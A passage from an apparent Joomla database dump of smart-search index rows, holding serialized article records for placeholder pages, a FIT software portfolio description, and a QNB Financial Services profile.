00:00:00\";s:10:\"start_date\";s:19:\"2011-01-01 00:00:01\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(129,'index.php?option=com_content&view=article&id=113','index.php?option=com_content&view=article&id=113:part&catid=14:sample-data-articles&Itemid=675','part','','2015-07-08 02:57:02','a7d98ad41415a92fc48cd42bea9b9583',1,1,1,'en-GB','2015-03-12 10:56:05','0000-00-00 00:00:00','2015-03-12 10:56:05','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"113\";s:5:\"alias\";s:4:\"part\";s:7:\"summary\";s:0:\"\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-07-08 06:57:00\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"0\";s:11:\"link_titles\";s:1:\"0\";s:10:\"show_intro\";s:1:\"0\";s:13:\"show_category\";s:1:\"0\";s:13:\"link_category\";s:1:\"0\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"0\";s:15:\"show_print_icon\";s:1:\"0\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"0\";s:20:\"show_article_options\";s:1:\"0\";s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"0\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:2:\"15\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:8:\"113:part\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:51:\"index.php/partners/14-sample-data-articles/113-part\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=113\";s:5:\"route\";s:94:\"index.php?option=com_content&view=article&id=113:part&catid=14:sample-data-articles&Itemid=675\";s:5:\"title\";s:4:\"part\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-03-12 10:56:05\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-03-12 10:56:05\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(130,'index.php?option=com_content&view=article&id=114','index.php?option=com_content&view=article&id=114:client&catid=14:sample-data-articles&Itemid=681','Client','','2015-07-08 02:58:17','41d739d4af48b843f62a3b392f2ca5e2',1,1,1,'en-GB','2015-03-15 05:22:50','0000-00-00 00:00:00','2015-03-15 05:22:50','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"114\";s:5:\"alias\";s:6:\"client\";s:7:\"summary\";s:0:\"\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-07-08 06:58:16\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"0\";s:11:\"link_titles\";s:1:\"0\";s:10:\"show_intro\";s:1:\"0\";s:13:\"show_category\";s:1:\"0\";s:13:\"link_category\";s:1:\"0\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"0\";s:15:\"show_print_icon\";s:1:\"0\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"0\";s:20:\"show_article_options\";s:1:\"0\";s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"0\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:2:\"14\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:10:\"114:client\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:53:\"index.php/clients1/14-sample-data-articles/114-client\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=114\";s:5:\"route\";s:96:\"index.php?option=com_content&view=article&id=114:client&catid=14:sample-data-articles&Itemid=681\";s:5:\"title\";s:6:\"Client\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-03-15 05:22:50\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-03-15 05:22:50\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(133,'index.php?option=com_content&view=article&id=118','index.php?option=com_content&view=article&id=118:fit-products-portfolio-includes&catid=14:sample-data-articles&Itemid=682','FIT Products Portfolio includes:','Besides ready-made applications already working in the Middle East area, FIT is provide its customers with expertise in the following sectors:','2015-07-08 03:08:01','6a72555ee6fd36c0075d5381f4fdf9a0',1,1,1,'en-GB','2015-04-12 18:33:39','0000-00-00 00:00:00','2015-04-12 18:33:39','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"118\";s:5:\"alias\";s:31:\"fit-products-portfolio-includes\";s:7:\"summary\";s:151:\"<p>Besides ready-made applications already working in the Middle East area, FIT is provide its customers with expertise in the following sectors:</p>\r\n\";s:4:\"body\";s:888:\"\r\n<ul>\r\n<li>Consultancy – Supporting its customers in the design phase, keeping in consideration every aspect of the system: technical, functional, and architectural;</li>\r\n<li>Design and Development – Through its specialized workgroups, the company can develop any type of complete solution, built on the assets of knowledge and experiences;</li>\r\n<li>Systems Support and Maintenance – Delivered to the customers for any type of requirement relevant to software, application management and data-stream.</li>\r\n</ul>\r\n<p> </p>\r\n<p>Through (solutions, consultancy, design and development, support and maintenance) FIT provides four products to customers in the Gulf Region: </p>\r\n<ul>\r\n<li>Real Time Brokerage System;</li>\r\n<li>Wealth Management Software;</li>\r\n<li>Portfolio Management Software;</li>\r\n<li>IPO Manager.</li>\r\n</ul>\r\n<p><img src=\"images/fitInclude.PNG\" alt=\"\" /></p>\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-07-08 07:08:00\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"7\";s:8:\"ordering\";s:2:\"10\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:35:\"118:fit-products-portfolio-includes\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:99:\"index.php/about-us/fitproductsportfolio/14-sample-data-articles/118-fit-products-portfolio-includes\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=118\";s:5:\"route\";s:121:\"index.php?option=com_content&view=article&id=118:fit-products-portfolio-includes&catid=14:sample-data-articles&Itemid=682\";s:5:\"title\";s:32:\"FIT Products Portfolio includes:\";s:11:\"description\";s:142:\"Besides ready-made applications already working in the Middle East area, FIT is provide its customers with expertise in the following sectors:\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 18:33:39\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 18:33:39\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(134,'index.php?option=com_content&view=article&id=134','index.php?option=com_content&view=article&id=134:qnb&catid=84:uae&Itemid=435','QNB','QNB Financial Services QNB Financial Services (QNB FS) was established in the last quarter of 2010 as part of the QNB Group, offering a range of financial services to foreign institutional investors, mutual funds, domestic institutional investors, high ne','2016-04-03 01:46:52','ea0ad84e2a345b4485d72302d15718ff',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"134\";s:5:\"alias\";s:3:\"qnb\";s:7:\"summary\";s:2256:\"<h1 class=\"page-title\" style=\"margin: 0px 0px 10px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 20px; line-height: inherit; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; width: 444px; color: #116fc4; font-weight: normal !important;\">QNB Financial Services</h1>\r\n<div style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\"> </div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\">QNB Financial Services (QNB FS) was established in the last quarter of 2010 as part of the QNB Group, offering a range of financial services to foreign institutional investors, mutual funds, domestic institutional investors, high net- worth individuals, retail and corporate clients.</div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\"> </div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\">QNB FS launched its brokerage unit in May 2011 providing both individual and institutional clients access to stocks listed on the Qatar securities markets.</div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\"> </div>\r\n<div class=\"contentDivEn\" style=\"margin: 0px; padding: 0px; border: 0px; font-stretch: inherit; font-size: 12px; line-height: 12px; font-family: Arial, Helvetica, sans-serif; vertical-align: baseline; color: #394040;\">It also provides access to stock trading on European and U.S. markets. Moreover, QNB FS offers world-class research and analysis enabling you to make sound investment decisions.</div>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2016-04-03 05:46:47\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"5\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:7:\"134:qnb\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super 